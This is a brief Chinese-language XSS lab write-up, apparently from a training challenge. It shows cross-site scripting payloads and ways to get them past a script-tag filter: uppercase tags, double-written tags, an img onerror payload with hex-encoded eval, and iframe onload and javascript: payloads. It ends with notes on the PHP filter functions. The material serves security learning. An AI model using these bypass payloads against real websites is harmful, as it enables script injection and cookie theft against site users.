输入常规的payload
<script>alert(document.cookie)</script>
script标签应该是被过滤了
方法一 大写绕过
<SCRIPT>alert(document.cookie)</SCRIPT>
执行成功
方法二 双写绕过
<sc<script>ript>alert('xss')</script>
方法三 其他标签
在这里插入代码片
img标签:
<img src=1 οnerrοr=alert('xss')>
<img src="1" οnerrοr=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img>
iframe标签:
<iframe οnlοad=alert(1)>
<iframe src=javascript:alert('xss');height=0 width=0 /><iframe>
PHP代码分析
pre标签
可定义预格式化的文本。被包围在 pre 元素中的文本通常会保留空格和换行符。而文本也会呈现为等宽字体。该标签的一个常见应用就是用来表示计算机的源代码。
header (“X-XSS-Protection: 0”);
array_key_exists()函数
str_replace() 函数